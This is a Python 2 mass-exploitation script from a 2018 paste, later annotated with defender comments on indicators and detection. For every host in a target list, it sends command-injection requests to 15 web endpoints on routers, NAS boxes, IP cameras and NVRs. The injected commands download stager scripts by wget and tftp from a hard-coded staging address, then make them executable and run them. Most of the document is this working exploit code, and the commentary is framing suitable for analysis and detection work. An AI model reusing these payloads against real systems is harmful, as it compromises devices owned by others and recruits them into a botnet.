
Untitled

a guest
Oct 30th, 2018
  1. import threading, sys, os, re, time, socket, requests, commands, urllib2
  2. from Queue import *
  3. from sys import stdout
  4.  
  # Start-up of a Python 2 script (print statements): argv[1] is a file with one
  # target host per line, argv[2] is the number of worker threads.
  5. if len(sys.argv) < 3:
  6. print "Usage: python "+sys.argv[0]+" <list> <threads>"
  7. sys.exit()
  8.  
  # The whole target list is read into memory; each entry keeps its trailing newline
  # until the per-target thread strips it.
  9. ips = open(sys.argv[1], "r").readlines()
  10. threads = int(sys.argv[2])
  11. queue = Queue()
  12. queue_count = 0
  13.  
  # Scheme prefix: every request built further down is plain HTTP.
  14. before = "http://" #http://
  15.  
  # Network indicator: the same hard-coded address is used for the HTTP (wget) and
  # the TFTP download of the stager scripts. Outbound connections from embedded
  # devices to it, on 80/tcp or 69/udp by default, are worth alerting on. Treat the
  # address as an indicator taken from this paste, not as one known to be live.
  16. tftpaddr = "95.215.60.17"
  17.  
  18. wgetaddr = "95.215.60.17"
  19.  
  # Stager script names requested from that host; usable as URI and file-name
  # indicators. The scripts themselves are not part of this page.
  20. wgetbin = "wgetbin.sh"
  21. tftp1bin = "tftp1bin.sh"
  22. tftp2bin = "tftp2bin.sh"
  23.  
  # Every list entry is queued before any worker starts; the counter is progress
  # output only.
  24. for ip in ips:
  25. queue_count += 1
  26. stdout.write("\r[%d] Added to queue" % queue_count)
  27. stdout.flush()
  28. queue.put(ip)
  29. print "\n"
  30.  
  # Worker loop run by each thread started at the bottom of the script. It takes one
  # list entry at a time, hands it to a new `brute` thread and moves on after 0.2 s
  # without waiting for that thread to finish, so the number of hosts contacted at
  # once is not bounded by the <threads> argument.
  # Defender note: the 0.2 s pause limits each worker to about five new targets per
  # second, which gives a rough upper bound for the scan rate of one instance.
  # NOTE(review): the paste lost its indentation; the nesting described here is
  # inferred from statement order.
  31. def w():
  32. try:
  33. while True:
  34. try:
  35. IP = queue.get()
  36. st4rt = brute(IP)
  37. st4rt.start()
  # Marked done as soon as the thread is started, not when its requests complete.
  38. queue.task_done()
  39. time.sleep(0.2)
  # Bare except: any error in the steps above only prints the message below and
  # the loop continues.
  40. except:
  41. print "[*] THREAD UNABLE TO START" #may spam if finished
  42. pass
  43. except:
  44. pass
  45.  
  46. #adminvehkoja22120024
  47. #0000f00: 0000 0000 0000 0000 0000 0000 0000 0000 ................
  48. #9 spaces
  49.  
  # Per-target thread. run() sends 15 HTTP GET requests, one after another with
  # 0.5 s pauses, to the host taken from the list. Each request addresses a different
  # embedded-device web endpoint (the product names are the author's own trailing
  # comments) and places the same shell command string into the query string.
  #
  # Defender notes:
  #  - The status checks (ret1..ret12 and the "if retN.code == 200" lines) are
  #    commented out, so every request goes to every host regardless of product.
  #    One source requesting this set of unrelated management paths in quick
  #    succession is a usable detection signal on its own.
  #  - The injected string is constant apart from the per-vector tag: "cd /tmp",
  #    "wget http://<wgetaddr>/wgetbin.sh", "chmod 777", "tftp ... -c get" and
  #    "tftp -r ... -g". Match on these in decoded request URIs; the HTTP client
  #    may percent-encode spaces and other characters, so confirm against captured
  #    traffic before writing exact-match rules.
  #  - No response is read and the bare except at the end discards every error, so
  #    a log hit shows an attempt only. Compromise has to be confirmed on the device
  #    side, for example outbound HTTP or TFTP to the staging address or new
  #    executable files under /tmp.
  #  - Mitigation sits with the device owner: keep these management interfaces off
  #    the internet, apply vendor firmware updates, and restrict egress from device
  #    networks so a stager download cannot complete.
  50. class brute(threading.Thread):
  51. def __init__ (self, ip):
  52. threading.Thread.__init__(self)
  # Removes the trailing newline that readlines() leaves on each list entry.
  53. self.ip = str(ip).rstrip('\n')
  54. def run(self):
  55. try:
  # Disabled fingerprinting: these probes and the "if retN.code == 200" lines
  # below would have limited each request to hosts answering on that path.
  56. #ret1 = urllib2.urlopen(before + self.ip + "/shell")
  57. #ret2 = urllib2.urlopen(before + self.ip + "/upgrade_handle.php")
  58. #ret3 = urllib2.urlopen(before + self.ip + "/setup.cgi")
  59. #ret4 = urllib2.urlopen(before + self.ip + "/cgi-bin/supervisor/PwdGrp.cgi")
  60. #ret5 = urllib2.urlopen(before + self.ip + "/cgi-bin/supervisor/CloudSetup.cgi")
  61. #ret6 = urllib2.urlopen(before + self.ip + "/cgi-bin/nobody/Search.cgi")
  62. #ret7 = urllib2.urlopen(before + self.ip + "/board.cgi")
  63. #ret8 = urllib2.urlopen(before + self.ip + "/app_license.shtml")
  64. #ret9 = urllib2.urlopen(before + self.ip + "/admin/confnetworking.html")
  65. #ret10 = urllib2.urlopen(before + self.ip + "/cgi-bin/webcm")
  66. #ret11 = urllib2.urlopen(before + self.ip + "/backupmgt/getAlias.php")
  67. #ret12 = urllib2.urlopen(before + self.ip + "/patch/books.cgi")
  68. #if ret1.code == 200:
  69. # print "JAWS Found: " + self.ip
  # The word after each "./<script>" (here "jaws") is an argument passed to the
  # stager; presumably it tags the vector for the operator. The stager is not
  # on this page, so this is unconfirmed.
  70. requests.get(before + self.ip + "/shell?" + "cd /tmp; wget http://" + wgetaddr + "/" + wgetbin + "; chmod 777 " + wgetbin + "; ./" + wgetbin + " jaws; tftp " + tftpaddr + " -c get " + tftp1bin + "; chmod 777 " + tftp1bin + "; ./" + tftp1bin + " jaws; tftp -r " + tftp2bin + " -g " + tftpaddr + "; chmod 777 " + tftp2bin + "; ./" + tftp2bin + " jaws;") # JAWS Web Server
  71. time.sleep(0.5)
  72. #if ret2.code == 200:
  73. # print "NetGear ReadyNAS Found: " + self.ip
  74. requests.get(before + self.ip + "/upgrade_handle.php?cmd=writeuploaddir&uploaddir=';" + "cd /tmp; wget http://" + wgetaddr + "/" + wgetbin + "; chmod 777 " + wgetbin + "; ./" + wgetbin + " readynas; tftp " + tftpaddr + " -c get " + tftp1bin + "; chmod 777 " + tftp1bin + "; ./" + tftp1bin + " readynas; tftp -r " + tftp2bin + " -g " + tftpaddr + "; chmod 777 " + tftp2bin + "; ./" + tftp2bin + " readynas;" + ";'") # Netgear ReadyNAS # works
  75. time.sleep(0.5)
  76. requests.get(before + self.ip + "/handle_daylightsaving.php?act=update&NTPServer=bla; " + "cd /tmp; wget http://" + wgetaddr + "/" + wgetbin + "; chmod 777 " + wgetbin + "; ./" + wgetbin + " readynas2; tftp " + tftpaddr + " -c get " + tftp1bin + "; chmod 777 " + tftp1bin + "; ./" + tftp1bin + " readynas2; tftp -r " + tftp2bin + " -g " + tftpaddr + "; chmod 777 " + tftp2bin + "; ./" + tftp2bin + " readynas2;") # ReadyNAS Surveillance
  77. time.sleep(0.5)
  78. #if ret3.code == 200:
  79. # print "NetGear DGN1000 Found: " + self.ip
  80. requests.get(before + self.ip + "/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=" + "cd /tmp; wget http://" + wgetaddr + "/" + wgetbin + "; chmod 777 " + wgetbin + "; ./" + wgetbin + " dgn1000; tftp " + tftpaddr + " -c get " + tftp1bin + "; chmod 777 " + tftp1bin + "; ./" + tftp1bin + " dgn1000; tftp -r " + tftp2bin + " -g " + tftpaddr + "; chmod 777 " + tftp2bin + "; ./" + tftp2bin + " dgn1000;" + "&curpath=/&currentsetting.htm=1") # NetGear DGN1000 #Works!
  81. time.sleep(0.5)
  82. #if ret4.code == 200:
  83. # print "AVTECH 1 Found: " + self.ip
  84. requests.get(before + self.ip + "/cgi-bin/supervisor/PwdGrp.cgi?action=add&user=test&pwd=;" + "cd /tmp; wget http://" + wgetaddr + "/" + wgetbin + "; chmod 777 " + wgetbin + "; ./" + wgetbin + " avtech1; tftp " + tftpaddr + " -c get " + tftp1bin + "; chmod 777 " + tftp1bin + "; ./" + tftp1bin + " avtech1; tftp -r " + tftp2bin + " -g " + tftpaddr + "; chmod 777 " + tftp2bin + "; ./" + tftp2bin + " avtech1;" + ";&grp=SUPERVISOR&lifetime=5%20MIN") # AVTECH Test 1
  85. time.sleep(0.5)
  86. #if ret5.code == 200:
  87. # print "AVTECH 2 Found: " + self.ip
  88. requests.get(before + self.ip + "/cgi-bin/supervisor/CloudSetup.cgi?exefile=" + "cd /tmp; wget http://" + wgetaddr + "/" + wgetbin + "; chmod 777 " + wgetbin + "; ./" + wgetbin + " avtech2; tftp " + tftpaddr + " -c get " + tftp1bin + "; chmod 777 " + tftp1bin + "; ./" + tftp1bin + " avtech2; tftp -r " + tftp2bin + " -g " + tftpaddr + "; chmod 777 " + tftp2bin + "; ./" + tftp2bin + " avtech2;") # AVTECH Test 2
  89. time.sleep(0.5)
  90. #if ret6.code == 200:
  91. # print "AVTECH 3 Found: " + self.ip
  92. requests.get(before + self.ip + "/cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=LW==&username=admin%20;XmlAp%20r%20Account.User1.Password>$(" + "cd /tmp; wget http://" + wgetaddr + "/" + wgetbin + "; chmod 777 " + wgetbin + "; ./" + wgetbin + " avtech3; tftp " + tftpaddr + " -c get " + tftp1bin + "; chmod 777 " + tftp1bin + "; ./" + tftp1bin + " avtech3; tftp -r " + tftp2bin + " -g " + tftpaddr + "; chmod 777 " + tftp2bin + "; ./" + tftp2bin + " avtech3;" + ";);&password=admin") #AVTECH Test 3
  93. time.sleep(0.5)
  94. #if ret7.code == 200:
  95. # print "Vacron NVR Found: " + self.ip
  96. requests.get(before + self.ip + "/board.cgi?cmd=" + "cd /tmp; wget http://" + wgetaddr + "/" + wgetbin + "; chmod 777 " + wgetbin + "; ./" + wgetbin + " vacron; tftp " + tftpaddr + " -c get " + tftp1bin + "; chmod 777 " + tftp1bin + "; ./" + tftp1bin + " vacron; tftp -r " + tftp2bin + " -g " + tftpaddr + "; chmod 777 " + tftp2bin + "; ./" + tftp2bin + " vacron;") # Vacron NVR Video recorder # not sure
  97. time.sleep(0.5)
  98. #if ret8.code == 200:
  99. # print "AXIS Found: " + self.ip
  100. requests.get(before + self.ip + "/app_license.shtml?app=ORWELLLABS;" + "cd /tmp; wget http://" + wgetaddr + "/" + wgetbin + "; chmod 777 " + wgetbin + "; ./" + wgetbin + " axis; tftp " + tftpaddr + " -c get " + tftp1bin + "; chmod 777 " + tftp1bin + "; ./" + tftp1bin + " axis; tftp -r " + tftp2bin + " -g " + tftpaddr + "; chmod 777 " + tftp2bin + "; ./" + tftp2bin + " axis;") # AXIS
  101. time.sleep(0.5)
  102. #if ret9.code == 200:
  103. # print "PineApp Found: " + self.ip
  104. requests.get(before + self.ip + "/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.com;" + "cd /tmp; wget http://" + wgetaddr + "/" + wgetbin + "; chmod 777 " + wgetbin + "; ./" + wgetbin + " pineapp; tftp " + tftpaddr + " -c get " + tftp1bin + "; chmod 777 " + tftp1bin + "; ./" + tftp1bin + " pineapp; tftp -r " + tftp2bin + " -g " + tftpaddr + "; chmod 777 " + tftp2bin + "; ./" + tftp2bin + " pineapp;") # PineApp MailSecure
  105. time.sleep(0.5)
  106. #if ret10.code == 200:
  107. # print "Fritz!Box Found: " + self.ip
  108. requests.get(before + self.ip + "/cgi-bin/webcm?getpage=../html/menus/menu2.html&var:lang=& ;" + "cd /tmp; wget http://" + wgetaddr + "/" + wgetbin + "; chmod 777 " + wgetbin + "; ./" + wgetbin + " fritzbox; tftp " + tftpaddr + " -c get " + tftp1bin + "; chmod 777 " + tftp1bin + "; ./" + tftp1bin + " fritzbox; tftp -r " + tftp2bin + " -g " + tftpaddr + "; chmod 777 " + tftp2bin + "; ./" + tftp2bin + " fritzbox;" + "; &") # Fritz!Box
  109. time.sleep(0.5)
  110. #if ret11.code == 200:
  111. # print "Seagate BlackArmor NAS Found: " + self.ip
  112. requests.get(before + self.ip + "/backupmgt/getAlias.php?ip=" + self.ip + " /etc/passwd; " + "cd /tmp; wget http://" + wgetaddr + "/" + wgetbin + "; chmod 777 " + wgetbin + "; ./" + wgetbin + " sgnas; tftp " + tftpaddr + " -c get " + tftp1bin + "; chmod 777 " + tftp1bin + "; ./" + tftp1bin + " sgnas; tftp -r " + tftp2bin + " -g " + tftpaddr + "; chmod 777 " + tftp2bin + "; ./" + tftp2bin + " sgnas;") # Seagate BlackArmor NAS sg2000-2000.1331
  113. time.sleep(0.5)
  114. #if ret12.code == 200:
  115. # print "Web Terra Found: " + self.ip
  116. requests.get(before + self.ip + "/patch/books.cgi?file=|;" + "cd /tmp; wget http://" + wgetaddr + "/" + wgetbin + "; chmod 777 " + wgetbin + "; ./" + wgetbin + " webterra; tftp " + tftpaddr + " -c get " + tftp1bin + "; chmod 777 " + tftp1bin + "; ./" + tftp1bin + " webterra; tftp -r " + tftp2bin + " -g " + tftpaddr + "; chmod 777 " + tftp2bin + "; ./" + tftp2bin + " webterra;" + ";|") # Web Terra 1.1 # Works
  117. time.sleep(0.5)
  118. requests.get(before + self.ip + "/cgi-bin/cgi_main?cmd=transfer_license&method=offline&sn=';" + "cd /tmp; wget http://" + wgetaddr + "/" + wgetbin + "; chmod 777 " + wgetbin + "; ./" + wgetbin + " nvrmini2; tftp " + tftpaddr + " -c get " + tftp1bin + "; chmod 777 " + tftp1bin + "; ./" + tftp1bin + " nvrmini2; tftp -r " + tftp2bin + " -g " + tftpaddr + "; chmod 777 " + tftp2bin + "; ./" + tftp2bin + " nvrmini2;" + ";#") # NVRmini2
  119. time.sleep(0.5)
  120. requests.get(before + self.ip + "/__debugging_center_utils___.php?log=something;" + "cd /tmp; wget http://" + wgetaddr + "/" + wgetbin + "; chmod 777 " + wgetbin + "; ./" + wgetbin + " nvrsolo; tftp " + tftpaddr + " -c get " + tftp1bin + "; chmod 777 " + tftp1bin + "; ./" + tftp1bin + " nvrsolo; tftp -r " + tftp2bin + " -g " + tftpaddr + "; chmod 777 " + tftp2bin + "; ./" + tftp2bin + " nvrsolo;") # NVRsolo
  # Bare except: connection errors, timeouts and everything else end the thread
  # silently, so the script keeps no record of which hosts responded.
  121. except:
  122. pass
  123.  
  # Starts <threads> worker threads, each running w(), 10 ms apart. A failure to
  # create or start a thread only prints the message below.
  124. for l in xrange(threads):
  125. try:
  126. t = threading.Thread(target=w)
  127. t.start()
  128. time.sleep(0.01)
  129. except:
  130. print "[-] FAILED TO START WORKER THREAD"
  131. pass